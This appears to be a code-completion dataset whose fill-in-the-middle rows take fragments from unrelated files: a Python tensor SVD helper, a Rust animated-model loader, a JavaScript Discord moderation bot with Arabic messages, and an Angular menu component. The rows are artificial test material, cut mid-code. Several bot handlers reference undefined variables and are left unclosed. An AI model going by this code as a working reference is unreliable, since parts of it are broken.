n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we can allow ellipsis denoting different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
|
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
"""
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None:
logger.info(f"The SVDConfig attribute '{ | raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}") | conditional_block |
main.rs | Mat4>,
}
#[inline(always)]
fn lerp<S, T: Add<T,T> + Sub<T,T> + Mul<S,T>>(start: T, end: T, s: S) -> T {
return start + (end - start) * s;
}
impl<'a> Model<'a> {
fn from_file(ai_scene: ai::Scene<'a>,
graphics: &mut gfx::Graphics<gfx::GlDevice, gfx::GlCommandBuffer>,
program: &gfx::ProgramHandle,
state: &gfx::DrawState,
texture_store: &TextureStore,
) -> Model<'a> {
// calculate the space we need to allocate
let mut num_vertices = 0;
let mut num_indices = 0;
for mesh in ai_scene.get_meshes().iter() {
num_vertices += mesh.num_vertices;
num_indices += mesh.num_faces * 3;
}
// prepare the data structures used to store the scene
let mut vertices = Vec::with_capacity(num_vertices as uint);
let mut indices = Vec::with_capacity(num_indices as uint);
// The bone weights and ids. Each vertex may be influenced by upto
// 4 bones
let mut bone_weights: Vec<Vec4> = Vec::from_elem(num_vertices as uint,
[0.0, ..4]);
let mut bone_ids: Vec<IVec4> = Vec::from_elem(num_vertices as uint,
[0, ..4]);
let bone_map = BoneMap::new(&ai_scene);
// stores the first index of each mesh, used for creating batches
let mut start_indices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
let mut materials = Vec::with_capacity(ai_scene.num_materials as uint);
let mut batches = Vec::with_capacity(ai_scene.num_meshes as uint);
| // find the textures used by this model from the list of materials
for mat in ai_scene.get_materials().iter() {
let texture_src = mat.get_texture(ai::material::TextureType::Diffuse,
0
);
match texture_src {
Some(s) => {
match texture_store.textures.get(&s) {
Some(t) => materials.push(t),
None => panic!("couldn't load texture: {}", s),
}
}
None => {
panic!("could read texture name from material: {}", texture_src);
}
}
}
// prepare the data for a format that can be loaded to the gpu
{
start_indices.push(0);
for mesh in ai_scene.get_meshes().iter() {
let vert_id_offset = vertices.len() as u32;
// get all the bone information for this mesh
for bone in mesh.get_bones().iter() {
let bone_id = bone_map.get_id(&bone.name.to_string());
// println!("{}: Bone id and name: {} ===> {}",
// mesh_num, bone_id, bone.name);
let bone_id = match bone_id {
None => panic!("Invaild bone reference"),
Some(id) => id,
};
'next_weight: for vert_weight in bone.get_weights().iter() {
let vertex_id = (vert_id_offset + vert_weight.vertex_id) as uint;
for i in range(0u, 4) {
if bone_ids[vertex_id][i] == 0 {
bone_weights[vertex_id][i] = vert_weight.weight;
bone_ids[vertex_id][i] = bone_id;
continue 'next_weight;
}
}
// assimp should have limited bone weights to 4
unreachable!();
}
}
let verts = mesh.get_vertices();
let norms = mesh.get_normals();
let tex_coords = mesh.get_texture_coords();
// fill up the vertex buffer
for i in range(0u, verts.len()) {
vertices.push( Vertex {
a_position: verts[i].to_array(),
a_normal: norms[i].to_array(),
a_tex_coord: if tex_coords.len() == 0 {
[0.0, 0.0, 0.0]
} else {
// only support 1 texture coord
tex_coords[0][i].to_array()
},
a_bone_weights: bone_weights[i + vert_id_offset as uint],
a_bone_ids: bone_ids[i + vert_id_offset as uint],
});
}
// fill up the index buffer
for face in mesh.get_faces().iter() {
let face_indices = face.get_indices();
assert!(face_indices.len() == 3);
indices.push(face_indices[0] + vert_id_offset);
indices.push(face_indices[1] + vert_id_offset);
indices.push(face_indices[2] + vert_id_offset);
}
start_indices.push(indices.len() as u32);
}
}
// create the vertex and index buffers
// generate the batches used to draw the object
{
let vert_buf = graphics.device.create_mesh(vertices.as_slice());
let ind_buf = graphics.device.create_buffer_static(indices.as_slice());
let mut buf_slices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
for ind in start_indices.windows(2) {
buf_slices.push(gfx::Slice {
start: ind[0],
end: ind[1],
prim_type: gfx::TriangleList,
// prim_type: gfx::LineStrip,
kind: gfx::SliceKind::Index32(ind_buf, 0 as u32),
});
}
for (slice, mesh) in buf_slices.iter()
.zip(ai_scene.get_meshes().iter()) {
let shader_data = ShaderParam {
u_model_view_proj: vecmath::mat4_id(),
t_color: (*materials[mesh.material_index as uint], None),
u_bone_transformations: u_bone_transformations.raw(),
};
batches.push(ModelComponent {
batch: graphics.make_batch(program,
&vert_buf,
*slice,
state).unwrap(),
shader_data: shader_data,
});
}
}
Model {
vertices: vertices,
indices: indices,
batches: batches,
bone_map: RefCell::new(bone_map),
bone_transform_buffer: u_bone_transformations,
global_inverse: ai_scene.get_root_node().transformation.inverse(),
scene: ai_scene,
}
}
fn interpolate_position(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_position_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for pos_keys in keys.windows(2) {
// note: once we find a match, we return
if time < pos_keys[1].time {
let dt = pos_keys[1].time - pos_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - pos_keys[0].time) / dt;
return lerp(pos_keys[0].value,
pos_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_scaling(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_scaling_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for scale_keys in keys.windows(2) {
// note: once we find a match, we return
if time < scale_keys[1].time {
let dt = scale_keys[1].time - scale_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - scale_keys[0].time) / dt;
return lerp(scale_keys[0].value,
scale_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_rotation(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Quaternion {
let keys = node.get_rotation_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for rot_keys in keys.windows(2) {
// note: once we find a match, we return
if time < rot_keys[1].time {
| // Create the buffer for the bone transformations. We fill this
// up each time we draw, so no need to do it here.
let u_bone_transformations: gfx::BufferHandle<Mat4> =
graphics.device.create_buffer(MAX_BONES, gfx::BufferUsage::Dynamic);
| random_line_split |
main.rs | <'a> {
pub vertices: Vec<Vertex>,
pub indices: Vec<u32>,
pub batches: Vec<ModelComponent>,
pub scene: ai::Scene<'a>,
pub bone_map: RefCell<BoneMap>,
pub global_inverse: ai::Matrix4x4,
pub bone_transform_buffer: gfx::BufferHandle<Mat4>,
}
#[inline(always)]
fn lerp<S, T: Add<T,T> + Sub<T,T> + Mul<S,T>>(start: T, end: T, s: S) -> T {
return start + (end - start) * s;
}
impl<'a> Model<'a> {
fn from_file(ai_scene: ai::Scene<'a>,
graphics: &mut gfx::Graphics<gfx::GlDevice, gfx::GlCommandBuffer>,
program: &gfx::ProgramHandle,
state: &gfx::DrawState,
texture_store: &TextureStore,
) -> Model<'a> {
// calculate the space we need to allocate
let mut num_vertices = 0;
let mut num_indices = 0;
for mesh in ai_scene.get_meshes().iter() {
num_vertices += mesh.num_vertices;
num_indices += mesh.num_faces * 3;
}
// prepare the data structures used to store the scene
let mut vertices = Vec::with_capacity(num_vertices as uint);
let mut indices = Vec::with_capacity(num_indices as uint);
// The bone weights and ids. Each vertex may be influenced by upto
// 4 bones
let mut bone_weights: Vec<Vec4> = Vec::from_elem(num_vertices as uint,
[0.0, ..4]);
let mut bone_ids: Vec<IVec4> = Vec::from_elem(num_vertices as uint,
[0, ..4]);
let bone_map = BoneMap::new(&ai_scene);
// stores the first index of each mesh, used for creating batches
let mut start_indices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
let mut materials = Vec::with_capacity(ai_scene.num_materials as uint);
let mut batches = Vec::with_capacity(ai_scene.num_meshes as uint);
// Create the buffer for the bone transformations. We fill this
// up each time we draw, so no need to do it here.
let u_bone_transformations: gfx::BufferHandle<Mat4> =
graphics.device.create_buffer(MAX_BONES, gfx::BufferUsage::Dynamic);
// find the textures used by this model from the list of materials
for mat in ai_scene.get_materials().iter() {
let texture_src = mat.get_texture(ai::material::TextureType::Diffuse,
0
);
match texture_src {
Some(s) => {
match texture_store.textures.get(&s) {
Some(t) => materials.push(t),
None => panic!("couldn't load texture: {}", s),
}
}
None => {
panic!("could read texture name from material: {}", texture_src);
}
}
}
// prepare the data for a format that can be loaded to the gpu
{
start_indices.push(0);
for mesh in ai_scene.get_meshes().iter() {
let vert_id_offset = vertices.len() as u32;
// get all the bone information for this mesh
for bone in mesh.get_bones().iter() {
let bone_id = bone_map.get_id(&bone.name.to_string());
// println!("{}: Bone id and name: {} ===> {}",
// mesh_num, bone_id, bone.name);
let bone_id = match bone_id {
None => panic!("Invaild bone reference"),
Some(id) => id,
};
'next_weight: for vert_weight in bone.get_weights().iter() {
let vertex_id = (vert_id_offset + vert_weight.vertex_id) as uint;
for i in range(0u, 4) {
if bone_ids[vertex_id][i] == 0 {
bone_weights[vertex_id][i] = vert_weight.weight;
bone_ids[vertex_id][i] = bone_id;
continue 'next_weight;
}
}
// assimp should have limited bone weights to 4
unreachable!();
}
}
let verts = mesh.get_vertices();
let norms = mesh.get_normals();
let tex_coords = mesh.get_texture_coords();
// fill up the vertex buffer
for i in range(0u, verts.len()) {
vertices.push( Vertex {
a_position: verts[i].to_array(),
a_normal: norms[i].to_array(),
a_tex_coord: if tex_coords.len() == 0 {
[0.0, 0.0, 0.0]
} else {
// only support 1 texture coord
tex_coords[0][i].to_array()
},
a_bone_weights: bone_weights[i + vert_id_offset as uint],
a_bone_ids: bone_ids[i + vert_id_offset as uint],
});
}
// fill up the index buffer
for face in mesh.get_faces().iter() {
let face_indices = face.get_indices();
assert!(face_indices.len() == 3);
indices.push(face_indices[0] + vert_id_offset);
indices.push(face_indices[1] + vert_id_offset);
indices.push(face_indices[2] + vert_id_offset);
}
start_indices.push(indices.len() as u32);
}
}
// create the vertex and index buffers
// generate the batches used to draw the object
{
let vert_buf = graphics.device.create_mesh(vertices.as_slice());
let ind_buf = graphics.device.create_buffer_static(indices.as_slice());
let mut buf_slices = Vec::with_capacity(ai_scene.num_meshes as uint + 1);
for ind in start_indices.windows(2) {
buf_slices.push(gfx::Slice {
start: ind[0],
end: ind[1],
prim_type: gfx::TriangleList,
// prim_type: gfx::LineStrip,
kind: gfx::SliceKind::Index32(ind_buf, 0 as u32),
});
}
for (slice, mesh) in buf_slices.iter()
.zip(ai_scene.get_meshes().iter()) {
let shader_data = ShaderParam {
u_model_view_proj: vecmath::mat4_id(),
t_color: (*materials[mesh.material_index as uint], None),
u_bone_transformations: u_bone_transformations.raw(),
};
batches.push(ModelComponent {
batch: graphics.make_batch(program,
&vert_buf,
*slice,
state).unwrap(),
shader_data: shader_data,
});
}
}
Model {
vertices: vertices,
indices: indices,
batches: batches,
bone_map: RefCell::new(bone_map),
bone_transform_buffer: u_bone_transformations,
global_inverse: ai_scene.get_root_node().transformation.inverse(),
scene: ai_scene,
}
}
fn interpolate_position(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_position_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for pos_keys in keys.windows(2) {
// note: once we find a match, we return
if time < pos_keys[1].time {
let dt = pos_keys[1].time - pos_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - pos_keys[0].time) / dt;
return lerp(pos_keys[0].value,
pos_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_scaling(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Vector3D {
let keys = node.get_scaling_keys();
// only one key, so no need to interpolate
if keys.len() == 1 {
return keys[0].value
}
// otherwise, find out which keys the given time falls between
// and interpolate
for scale_keys in keys.windows(2) {
// note: once we find a match, we return
if time < scale_keys[1].time {
let dt = scale_keys[1].time - scale_keys[0].time;
// how far inbetween the frams we are on a scale from 0 to 1
let s = (time - scale_keys[0].time) / dt;
return lerp(scale_keys[0].value,
scale_keys[1].value,
s as f32);
}
}
// get the last frame, if we didn't find a match
return keys[keys.len()-1].value
}
fn interpolate_rotation(&self,
time: f64,
node: &ai::animation::NodeAnim
) -> ai::Quaternion {
let keys = node.get_rotation_keys();
// only one key, so no need to interpolate
| Model | identifier_name |
|
bot.js | ].bans = 0;
},Otime)
} catch (error) {
console.log(error)
}
}
}
})
});
let channelc = {};
client.on('channelCreate', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelcreate = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was Created By ${channelcreate.tag}`);
if(!channelc[channelcreate.id]) {
channelc[channelcreate.id] = {
created : 0
}
}
channelc[channelcreate.id].created += 3;
if(channelc[channelcreate.id].created >= Onumber ) {
let roles = guild.members.get(banner).roles.array();
guild.members.get(banner).removeRoles(roles);
rebellog.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر @everyone`);
channel.guild.owner.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر ${channel.guild.name}`)
}
setTimeout(() => {
channelc[channelcreate.id].created = 0;
},Otime)
});
let channelr = {};
client.on('channelDelete', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelremover = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was deleted By ${channelremover.tag}`);
if(!channelr[channelremover.id]) {
channelr[channelremover.id] = {
deleted : 0
}
}
client.on('message', message => {
var prefix = "$";
if (message.author.id === client.user.id) return;
if (message.guild) {
let embed = new Discord.RichEmbed()
let args = message.content.split(' ').slice(1).join(' ');
if(message.content.split(' ')[0] == prefix + 'bc') {
if (!args[1]) {
message.channel.send("**اكتب شي بعد الكوماند**");
return;
}
message.guild.members.forEach(m => {
if(!message.member.hasPermission('ADMINISTRATOR')) return;
var bc = new Discord.RichEmbed()
.addField('» السيرفر :', `${message.guild.name}`)
.addField('» المرسل : ', `${message.author.username}#${message.author.discriminator}`)
.addField(' » الرسالة : ', args)
.setColor('#ff0000')
// m.send(`[${m}]`);
m.send(`${m}`,{embed: bc});
});
}
} else {
return;
}
});
client.on('guildMemberAdd', member => {
member.guild.fetchInvites().then(guildInvites => {
const ei = invites[member.guild.id];
const invite = guildInvites.find(i => ei.get(i.code).uses < i.uses);
const inviter = client.users.get(invite.inviter.id);
const channel = member.guild.channels.find("name", "✽-welcome");
channel.send(`<@${member.user.id}> ** joined; ** Invited by ** <@${inviter.id}> ** `);
});
});
1.36 KB
client.on('message', message => {
var prefix = "$"
if (message.content.startsWith(prefix + 'id')) {
if (message.author.bot) return
if (!message.guild) return message.reply('**This Command Just In Servers**')
message.guild.fetchInvites().then(invs => {
let personalInvites = invs.filter(i => i.inviter.id === message.author.id)
let inviteCount = personalInvites.reduce((p, v) => v.uses + p, 0)
var roles = message.member.roles.map(roles => `**__${roles.name}__ |**`).join(` `)
let id = new Discord.RichEmbed()
.setColor('RANDOM')
.setTitle(':clipboard: | User identity info')
.setAuthor(message.author.username,message.author.avatarURL)
.addField('• Name :', message.author.username,true)
.addField('• Tag :', message.author.discriminator,true)
.addField('• ID :', message.author.id,true)
.addField('• JoinedAt :', moment(message.joinedAt).format('D/M/YYYY h:mm a '),true)
.addField('• CreatedAt :', moment(message.joinedAt).format('D/M/YYYY h:mm a '),true)
.addField('• Total invites :', inviteCount,true)
.addField('• Roles :', roles)
.setTimestamp()
message.channel.sendEmbed(id).then(c => {
c.react('📋')
})
})
}
});
var prefix = "$"
client.on("message", (message) => {
if (message.content.startsWith("${prefix}kick")) {
if(!message.member.hasPermission('KICK_MEMBERS')) return message.reply('? ماعندك الصلاحيات');
var member= message.mentions.members.first();
member.kick().then((member) => {
message.channel.send(member.displayName + " مع السلامه :wave: ");
}).catch(() => {
message.channel.send("Error -_-");
});
}
});
var prefix = "$"
client.on('message', message => {
if (message.author.xErenaa) return;
if (!message.content.startsWith(prefix)) return;
let command = message.content.split(" ")[0];
command = command.slice(prefix.length);
let args = message.content.split(" ").slice(1);
if (command == "ban") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.guild.member(message.author).hasPermission("BAN_MEMBERS")) return message.reply("**You Don't Have ` BAN_MEMBERS ` Permission**");
if(!message.guild.member(client.user).hasPermission("BAN_MEMBERS")) return message.reply("**I Don't Have ` BAN_MEMBERS ` Permission**");
let user = message.mentions.users.first();
let reason = message.content.split(" ").slice(2).join(" ");
/*let bErenaalog = client.channels.find("name", "Erenaa-log");
if(!bErenaalog) return message.reply("I've detected that this server doesn't have a Erenaa-log text channel.");*/
if (message.mentions.users.size < 1) return message.reply("**منشن شخص**");
if(!reason) return message.reply ("**اكتب سبب الطرد**");
if (!message.guild.member(user)
.bannable) return message.reply("**لايمكنني طرد شخص اعلى من رتبتي يرجه اعطاء البوت رتبه عالي**");
message.guild.member(user).ban(7, user);
const banembed = new Discord.RichEmbed()
.setAuthor(`BANNED!`, user.displayAvatarURL)
.setColor("RANDOM")
.setTimestamp()
.addField("**User:**", '**[ ' + `${user.tag}` + ' ]**')
.addField("**By:**", '**[ ' + `${message.author.tag}` + ' ]**')
.addField("**Reason:**", '**[ ' + `${reason}` + ' ]**')
message.channel.send({
embed : banembed
})
}
});
client.on('message', message => {
if(!message.channel.guild) return;
if(message.content.startsWith(prefix + 'move')) {
if (message.member.hasPermission("MOVE_MEMBERS")) {
if (message.mentions.users.size === 0) {
return message.channel.send("``لاستخدام الأمر اكتب هذه الأمر : " +prefix+ "move [USER]``")
}
if (message.member.voiceChannel != null) {
if (message.mentions.members.first().voiceChannel != null) {
var authorchannel = message.member.voiceChannelID;
var usermentioned = message.mentions.members.first().id;
var embed = new Discord.RichEmbed()
.setTitle("Succes!")
.setColor("#000000")
.setDescription(`لقد قمت بسحب <@${usermentioned}> الى الروم الصوتي الخاص بك✅ `)
var embed = new Discord.RichEmbed()
.setTitle(`You are Moved in ${message.guild.name}`)
.setColor("RANDOM")
.setDescription(`**<@${message.author.id}> Moved You To His Channel!\nServer --> ${message.guild.name}**`)
message.guild.members.get(usermentioned).setVoiceChannel(authorchannel).then(m => message.channel.send(embed))
message.guild.members.get(usermentioned).send(embed)
} else {
message.channel.send("``لا تستطيع سحب "+ message.mentions.members.first() +" `يجب ان يكون هذه العضو في روم صوتي`")
}
} else {
message.channel.send("**``يجب ان تكون في روم صوتي لكي تقوم بسحب العضو أليك``**")
}
} else {
message.react("❌")
}}}) | ;
Save New Duplicate & Edit Just Text Twitter
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15 | conditional_block |
|
bot.js | .addField('**__ Voice Channels | رومات صوتيه__**',`[** __${msg.guild.channels.filter(m => m.type === 'voice').size}__ **]`,true)
.addField('**__ Created At | صنع في __**',msg.guild.createdAt.toLocaleString())
msg.channel.send({embed:embed});
}
});
client.on('message', message => {
var prefix = "$";
if(message.content === prefix + "cc") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.member.hasPermission('MANAGE_MESSAGES')) return message.reply(' **تم قفل الشات*');
message.channel.overwritePermissions(message.guild.id, {
SEND_MESSAGES: false
}).then(() => {
message.reply("**تم قفل الشات :white_check_mark: **")
});
}
//FIRE BOT
if(message.content === prefix + "oc") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.member.hasPermission('MANAGE_MESSAGES')) return message.reply('**تم فتح الشات**');
message.channel.overwritePermissions(message.guild.id, {
SEND_MESSAGES: true
}).then(() => {
message.reply("**تم فتح الشات :white_check_mark:**")
});
}
client.on('message', msg => {
if (msg.author.bot) return;
if (!msg.content.startsWith(prefix)) return;
let command = msg.content.split(" ")[0];
command = command.slice(prefix.length);
let args = msg.content.split(" ").slice(1);
if(command === "clear") {
const emoji = client.emojis.find("name", "wastebasket")
let textxt = args.slice(0).join("");
if(msg.member.hasPermission("MANAGE_MESSAGES")) {
if (textxt == "") {
msg.delete().then
msg.channel.send("***```Supply A Number ًں‘Œ```***").then(m => m.delete(3000));
} else {
msg.delete().then
msg.delete().then
msg.channel.bulkDelete(textxt);
msg.channel.send("```Cleard: " + textxt + "\n Messages```").then(m => m.delete(3000));
}
}
}
});
client.on('message', message => {
if (message.content === "$bot") {
var year = message.guild.createdAt.getFullYear()
var month = message.guild.createdAt.getMonth()
var day = message.guild.createdAt.getDate()
let embed = new Discord.RichEmbed()
.addField('**Bot Servers**',`[ ${client.guilds.size} ]`)
.addField('**Users**',`[ ${client.users.size} ]`)
.addField('**Channels**',`[ ${client.channels.size} ]`)
.addField('**ID**',`[ ${client.user.id} ]`)
.addField('**Name**',`[ ${client.user.tag} ]`)
.addField('Requested by:', "<@" + message.author.id + ">")
.setColor("#51cde6")
.setDescription(`${message.guild.name}`)
message.channel.sendEmbed(embed);
}
});;
client.on('message', message => {
if(message.content.includes('discord.gg')){
if(!message.channel.guild) return message.reply('** advertising me on DM ? **');
if (!message.member.hasPermissions(['ADMINISTRATOR'])){
message.delete()
return message.reply(`** No Invite Links !**`)
}
}
});
var AsciiTable = require('ascii-data-table').default
client.on('message', message =>{
if(message.content == "#roles"){
if(message.guild.member(message.author).hasPermission("ADMINISTRATOR"))
var
ros=message.guild.roles.size,
data = [['Rank', 'RoleName']]
for(let i =0;i<ros;i++){
if(message.guild.roles.array()[i].id !== message.guild.id){
data.push([i,`${message.guild.roles.filter(r => r.position == ros-i).map(r=>r.name)}`])
}}
let res = AsciiTable.table(data)
message.channel.send(`**\`\`\`xl\n${res}\`\`\`**`);
}
}); |
var guilds = {};
client.on('guildBanAdd', function(guild) {
const rebellog = client.channels.find("name", "log"),
Onumber = 10,
Otime = 10000
guild.fetchAuditLogs({
type: 22
}).then(audit => {
let banner = audit.entries.map(banner => banner.executor.id)
let bans = guilds[guild.id + banner].bans || 0
guilds[guild.id + banner] = {
bans: 0
}
bans[guilds.id].bans += 3;
if(guilds[guild.id + banner].bans >= Onumber) {
try {
let roles = guild.members.get(banner).roles.array();
guild.members.get(banner).removeRoles(roles);
} catch (error) {
console.log(error)
try {
guild.members.get(banner).removeRoles(roles);
rebellog.send(`<@!${banner.id}>
حآول العبث بالسيرفر @everyone`);
guild.owner.send(`<@!${banner.id}>
حآول العبث بالسيرفر ${guild.name}`)
setTimeout(() => {
guilds[guild.id].bans = 0;
},Otime)
} catch (error) {
console.log(error)
}
}
}
})
});
let channelc = {};
client.on('channelCreate', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelcreate = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was Created By ${channelcreate.tag}`);
if(!channelc[channelcreate.id]) {
channelc[channelcreate.id] = {
created : 0
}
}
channelc[channelcreate.id].created += 3;
if(channelc[channelcreate.id].created >= Onumber ) {
let roles = guild.members.get(banner).roles.array();
guild.members.get(banner).removeRoles(roles);
rebellog.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر @everyone`);
channel.guild.owner.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر ${channel.guild.name}`)
}
setTimeout(() => {
channelc[channelcreate.id].created = 0;
},Otime)
});
let channelr = {};
client.on('channelDelete', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelremover = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was deleted By ${channelremover.tag}`);
if(!channelr[channelremover.id]) {
channelr[channelremover.id] = {
deleted : 0
}
}
client.on('message', message => {
var prefix = "$";
if (message.author.id === client.user.id) return;
if (message.guild) {
let embed = new Discord.RichEmbed()
let args = message.content.split(' ').slice(1).join(' ');
if(message.content.split(' ')[0] == prefix + 'bc') {
if (!args[1]) {
message.channel.send("**اكتب شي بعد الكوماند**");
return;
}
message.guild.members.forEach(m => {
if(!message.member.hasPermission('ADMINISTRATOR')) return;
var bc = new Discord.RichEmbed()
.addField('» السيرفر :', `${message.guild.name}`)
.addField('» المرسل : ', `${message.author.username}#${message.author.discriminator}`)
.addField(' » الرسالة : ', args)
.setColor('#ff0000')
// m.send(`[${m}]`);
m.send(`${m}`,{embed: bc});
});
}
} else {
return;
}
});
client.on('guildMemberAdd', member => {
member.guild.fetchInvites().then(guildInvites => {
const ei = invites[member.guild.id];
const invite = guildInvites.find(i => ei.get(i.code).uses < i.uses);
const inviter = client.users.get(invite.inviter.id);
const channel = member.guild.channels.find("name", "✽-welcome");
channel.send(`<@${member.user.id}> ** joined; ** Invited by ** <@${inviter.id}> ** `);
});
});
1.36 KB
client.on('message', message => {
var prefix = "$"
if (message.content.startsWith(prefix + 'id')) {
if (message.author.bot) return
if (!message.guild) return message.reply('**This Command Just In Servers**')
message.guild.fetchInvites().then(invs => {
let personalInvites = invs.filter(i => i.inviter.id === message.author.id)
let inviteCount = personalInvites.reduce((p, v) => v.uses + p, 0)
var roles = message.member.roles.map(roles => | random_line_split |
|
menus.component.ts | );
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) {
this.iab.create( url, '_system' );
}
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
